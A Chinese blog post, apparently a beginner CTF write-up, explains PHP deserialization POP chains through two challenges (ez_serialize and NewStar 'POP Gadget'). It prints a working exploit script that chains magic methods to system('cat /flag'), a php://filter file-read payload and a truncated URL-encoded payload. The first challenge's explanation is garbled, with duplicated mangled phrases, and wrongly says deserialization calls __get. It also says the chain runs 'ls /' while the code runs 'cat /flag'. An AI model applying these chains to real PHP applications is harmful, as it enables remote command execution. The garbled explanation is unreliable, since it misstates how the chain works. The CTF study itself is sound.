适合新手的php反序列化pop链构建思路和原理(有例题,无echo调用tostring)

已于 2023-10-24 22:56:34 修改
阅读量537 收藏 5
点赞数 4
分类专栏: ctf 文章标签: php web安全 网络安全 安全
于 2023-10-24 00:12:11 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2301_76690905/article/details/133763490
版权

1、shctf2023的ez_serialize

是新手题难度不大,题目如下:

<?php
highlight_file(__FILE__);

class A{
  public $var_1;
  
  public function __invoke(){
   include($this->var_1);
  }
}

class B{
  public $q;
  public function __wakeup()
{
  if(preg_match("/gopher|http|file|ftp|https|dict|\.\./i", $this->q)) {
            echo "hacker";           
        }
}

}
class C{
  public $var;
  public $z;
    public function __toString(){
        return $this->z->var;
    }
}

class D{
  public $p;
    public function __get($key){
        $function = $this->p;
        return $function();
    }  
}

if(isset($_GET['payload']))
{
    unserialize($_GET['payload']);
}
?>

对于这个pop链的执行过程,可以进一步详细解释。首先,让我们逐步追踪反序列化的过程:

  1. 反序列化开始时,会先对最内层的对象a进行反序列化,即将‘a进行反序列化,即将‘var_1属性赋值为字符串"php://filter/read=convert.base64-encode/resource=flag.php"`。

  2. 然后,对对象d进行反序列化,它的‘d进行反序列化,它的‘p属性引用了对象$a。在反序列化过程中,会调用对象$d的__get()`函数,返回对象$a的结果。

  3. 接下来是对象c的反序列化,其中‘c的反序列化,其中‘z属性引用了对象$d。同样,在反序列化过程中,会调用对象$c的__get()函数,再次触发对象$d的__get()`函数,将对象a返回给对象a返回给对象c。

  4. 最后,对对象b进行反序列化,它的‘b进行反序列化,它的‘q属性引用了对象$c。在这一步中,会调用对象$b的__wakeup()函数。在当前代码中,__wakeup()函数使用正则表达式匹配$q`属性以检测恶意输入,如果匹配成功,则输出"hacker"。

  5. 在示例中,C类中的var属性是一个指向自己的引用。也就是说,$c->var指向了$c对象本身。这样的引用关系可以在对象内部形成递归结构,即对象包含对自身的引用。

    当我们将这个对象进行序列化时,整个对象图(包括引用关系)都会被序列化。这意味着在序列化过程中,会将$c对象及其相关引用也进行序列化。在反序列化时,被序列化的对象图会被还原,重建出原始的对象及其引用关系。

    由于C类实现了__toString()方法,该方法定义了如何以字符串形式表示对象。在示例中,__toString()方法返回了$z属性的var值,即$a->var_1。因此,在反序列化时,如果尝试将$c对象作为字符串输出(例如使用echo语句),就会间接调用C类的__toString()方法,从而返回$a->var_1的值。

    总结起来,尽管示例中没有直接尝试输出C类的对象,但是由于序列化和反序列化过程会还原整个对象图,当尝试以字符串形式输出$c对象时,会触发间接调用C类的__toString()方法,并返回相应的值。

2、Newstar week3 POP Gadget

题目代码如下

 <?php
class Begin{
    public $name;
 
    public function __destruct()
    {
        if(preg_match("/[a-zA-Z0-9]/",$this->name)){
            echo "Hello";
        }else{
            echo "Welcome to NewStarCTF 2023!";
        }
    }
}
 
class Then{
    private $func;
 
    public function __toString()
    {
        ($this->func)();
        return "Good Job!";
    }
 
}
 
class Handle{
    protected $obj;
 
    public function __call($func, $vars)
    {
        $this->obj->end();
    }
 
}
 
class Super{
    protected $obj;
    public function __invoke()
    {
        $this->obj->getStr();
    }
 
    public function end()
    {
        die("==GAME OVER==");
    }
}
 
class CTF{
    public $handle;
 
    public function end()
    {
        unset($this->handle->log);
    }
 
}
 
class WhiteGod{
    public $func;
    public $var;
 
    public function __unset($var)
    {
        ($this->func)($this->var);    
    }
}
 
@unserialize($_POST['pop']);

($this->func)($this->var) 将 $this->var 作为参数传递给保存在 $this->func 变量中的函数或方法。 这里我们可以给func传'system',var传'ls /'查根目录,起到一个system()的作用然后读flag文件。

pop链如下:

     <?php
     
    class Begin{
        public $name;
     
        public function __destruct()
        {
     
        }
    }
     
    class Then{
        private $func;
        
        public function __construct()
     
        {
     
            $s=new Super();
     
            $this->func=$s;
     
        }
     
        public function __toString(){
            ($this->func)();//这里把Super当函数调用,实际触发了Super()里面的__invoke方法
            return "Good Job!";
        }
    }
     
    class Handle{
        protected $obj;
        public function __construct()
     
        {
     
            $this->obj=new CTF();//实例化CTF()后给这里的obj赋值
     
        }
     
        public function __call($func, $vars)
        {
            $this->obj->end();//调用了CTF()里的end()方法
        }
     
    }
     
    class Super{
        protected $obj;
        public function __construct()
     
        {
     
            $this->obj=new Handle();//为protected $obj赋值
        }
        public function __invoke()
        {
            $this->obj->getStr();//Handle 类没有定义 getStr() 方法,因此在调用这个方法时会触发 handle里的__call() 魔术方法
        }
     
        public function end()
        {
            die("==GAME OVER==");
        }
    }
     
    class CTF{
        public $handle;
     
        public function __construct()
     
        {
     
            $w=new WhiteGod();
     
            $this->handle=$w;
     
        }
        public function end()
        {
            unset($this->handle->log);//在这个end()方法中我们试图用unset()删除WhiteGod()里面的log属性
        }
     
    }
     
    class WhiteGod{
        public $func='system';
        public $var="cat /flag";
     
        public function __unset($var)
        {
            ($this->func)($this->var);    
        }
    }
    $b=new Begin();
    $b->name=new Then();
    echo urlencode(serialize($b));

需要特别注意的是在执行 unset($this->handle->log) 时,会尝试调用 $this->handle 对象的 __unset() 魔术方法。该方法将使用属性 $this->func 的值作为可调用函数,并将属性 $this->var 的值作为参数来执行。

因此,在 WhiteGod 类中调用 unset($this->handle->log) 将实际上执行 ($this->func)($this->var),相当于执行 system('ls /'),即执行系统命令 ls /

整体来说是:

__destruct() 中,由于 $name 包含一个 Then 对象,会触发 __toString() 魔术方法。在 __toString() 方法中,首先调用 $this->func 属性指向的对象(即 Super 对象),接下来进入 Super 类,由于该类含有一个 __invoke() 魔术方法,因此在调用 Super 对象时会触发 __invoke() 方法。在 __invoke() 方法中,又会调用 $this->obj->getStr() 方法,并进入 Handle 类中。

由于 Handle 类没有定义 getStr() 方法,因此在调用这个方法时会触发 __call() 魔术方法。在 __call() 方法中,将会调用 $this->obj->end() 方法,并触发 CTF 类中的 end() 方法。

在 CTF 类的 end() 方法中,我们会调用 unset($this->handle->log),从而触发 WhiteGod 类的 __unset() 魔术方法。在 __unset() 方法中,我们构造了一个命令行字符串,然后通过执行漏洞执行了系统命令。

payload:

pop=O%3A5%3A%22Begin%22%3A1%3A%7Bs%3A4%3A%22name%22%3BO%3A4%3A%22Then%22%3A1%3A%7Bs%3A10%3A%22%00Then%00func%22%3BO%3A5%3A%2
 

时代少年团队长乌萨奇的颜值一直被质疑
关注
  • 4
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
PHP之序列化与反序列化(POP篇)
errorr0
03-11 5084
序列化与反序列化的进阶
ez_serialize复现
Sk1y的博客
10-13 531
文章目录解题过程 解题过程 题目给了源码 <?php error_reporting(0); highlight_file(__FILE__); class A{ public $class; public $para; public $check; public function __construct() { $this->class = "B"; $this->para = "ctfer";
PHP反序列化--pop
最新发布
2302_79800344的博客
03-18 1179
pop知识是PHP反序列化模块不可或缺的组成部分
WEB攻防-PHP反序列化&POP构造&魔术方法流程&漏洞触发条件&属性修改
siu~
11-10 425
1、PHP-反序列化-应用&识别&函数 2、PHP-反序列化-魔术方法&触发规则 3、PHP-反序列化-联合漏洞&POP构造
PHP反序列化漏洞(最全面最详细有例题)
m0_73728268的博客
04-14 2338
详细讲解PHP反序列化漏洞的基本原理及利用,由简入精,深入浅出;包含Docker环境搭建,例题解析;类与对象简介;序列化与反序列化基础知识;魔术方法原理及利用;POP构造及解析;字符串逃逸;session反序列化,phar反序列化等;
php反序列化POP 的构造利用
cosmoslin的博客
09-14 2019
POP 的构造利用 一、POP简介 1、POP 面向属性编程(Property-Oriented Programing) 常用于上层语言构造特定调用的方法,与二进制利用中的面向返回编程(Return-Oriented Programing)的原理相似,都是从现有运行环境中寻找一系列的代码或者指令调用,然后根据需求构成一组连续的调用,最终达到攻击者邪恶的目的。类似于PWN中的ROP,有时候反序列化一个对象时,由它调用的__wakeup()中又去调用了其他的对象,由此可以溯源而上,利用一次次的“gadg
PHP多种序列化/反序列化的方法详解
10-19
本篇文章主要介绍了PHP多种序列化/反序列化的方法详解,小编觉得挺不错的,现在分享给大家,也给大家做个参考。一起跟随小编过来看看吧
CommonsCollection6反序列化学习.doc
07-09
CommonsCollection6 反序列化学习 CommonsCollection6 反序列化学习是 Java 中一个常见的反序列化攻击,攻击者可以利用该来执行恶意代码。下面我们将详细介绍 CommonsCollection6 反序列化原理和实现...
PHP面向对象程序设计__tostring()和__invoke()用法分析
01-03
本文实例讲述了PHP面向对象程序设计__tostring()和__invoke()用法。分享给大家供大家参考,具体如下: __tostring()魔术方法 将一个对象当做一个字符串来使用时,会自动调用该方法,并且在该方法中,可以返回一定的...
toString()一个会自动调用的方法
01-19
这一特性显然有助于你偷懒,当然也有利于实现一些特定的功能。为了说明这一特性,下面从一个实际开发案例说起。 如果在你的WEB项目中,有很多地方都需要输出像下面这样的一个列表HTML: 代码如下: <ul> <li>...
php面向对象全攻略 (十一)__toString()用法 克隆对象 __call处理调用错误
12-17
16.__toString()方法 我们前面说过在类里面声明“— ”开始的方法名的方法(PHP 给我们提供的),都是在 某一时刻不同情况下自动调用执行的方法,“__toString()”方法也是一样自动被调用的,是在 直接输出对象引用...
PHP反序列化&POP的构造——2021第五空间CTF pklovecloud
iO快到碗里来
09-20 2638
网上关与PHP反序列化&POP构造的文章有很多,笔者在这里简要讲解一下其相关知识。 0x01 序列化和反序列化 为方便存储和传输对象,将对象转化为字符串的操作叫做序列化( serialize() ),将所转化的字符串恢复成对象的过程叫做反序列化( unserialize() )。 举个栗子: <?php Class test{ public $a= '1'; public $bb= 2; public $ccc= True; } $r= new test(); ec
[BugKu Web]ez_serialize
qq_41513009的博客
04-23 4333
[BugKu] Web-ez_java_serialize
CTF-PHP反序列化漏洞4-实例理解POP(经典赛题)
Eason_LYC安全白帽子的成长博客
05-08 2211
悲观者预言失败,十言九中。乐观者创造奇迹,一次即可。一个人的价值,在于他所拥有的。可以不学无术,但不能一无所有!关注WEB安全、网络攻防。我的专栏文章知识点全面细致,逻辑清晰、结合实战,让你在学习路上事半功倍,少走弯路!追求技术至上,这是我们理想中的极乐世界~(关注我即可加入社区)本专栏打破以往CTF速成或就题论题模式。采用。让刚接触CTF的读者真正掌握CTF中各类型知识点,为后续自学或快速刷题备赛,打下坚实的基础~
php反序列化pop构造
m0_62422842的博客
04-06 7440
前言 随着对反序列化学习的不断深入,我们来学习一下pop的构造。这个pop对于我这种小白来说还是比较难理解的,再次写下这篇文章总结一下,加深自己对构造pop的理解。同时也是提供想要入坑的小伙伴们一些理解。 pop构造 一般的反序列化题目,存在漏洞或者能注入恶意代码的地方在魔术方法中,我们可以通过自动调用魔术方法来达到攻击效果。但是当注入点存在普通的类方法中,通过前面自动调用的方法就失效了,所以我们需要找到普通类与魔术方法之间的联系,理出一种逻辑思路,通过这种逻辑思路来构造一条pop,从而达到
PHP 魔术方法浅谈
ansong8919的博客
03-23 201
php中把以两个下划线(__)开头的方法称之为魔术方法。魔术方法包括: __construct() 类的构造方法 构建方法时被调用 __destruct() 类的析构方法 明确销毁对象或脚本结束时被调用 __call() 在一个类中调用一个不可访问或不存在的方法时使用 __callStatic() 调用不可访问或者是不存在的静...
PHP反序列化入门之寻找POP(一)
weixin_44304686的博客
06-12 1345
原文接:https://mochazz.github.io/2019/02/06/PHP反序列化入门之寻找POP(一)/ 本文以 code-breaking 中 lumenserial 为例,练习PHP反序列化 POP 的寻找,题目地址:https://code-breaking.com/puzzle/7/ 。 环境搭建 运行环境要求 PHP >= 7.1.3 OpenSSL PHP...
PHP反序列化—构造POP
Lemon's blog
04-03 4546
前言: 最近在刷题的时候发现这个PHP反序列化POP,之前理解的序列化攻击多是在魔术方法中出现一些利用的漏洞,自动调用从而触发漏洞。但如果关键代码不在魔术方法中,而是在一个类的普通方法中。这时候可以通过寻找相同的函数名将类的属性和敏感函数的属性联系起来。 直接通过题目来进行学习,这样更容易掌握!!! Ezpop class Modifier { protected $var; ...
JSON的toString和parse是不是就是序列化和反序列化
05-04
是的,JSON的toString和parse方法可以看作是JSON对象的序列化和反序列化操作。toString方法将JavaScript对象转换为JSON格式的字符串,而parse方法将JSON格式的字符串转换为JavaScript对象。这样可以方便地在不同的系统之间传递数据,或者将数据存储到本地存储等介质中。序列化和反序列化操作在编程中非常常见,不仅在JavaScript中,也在其他编程语言中广泛使用。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值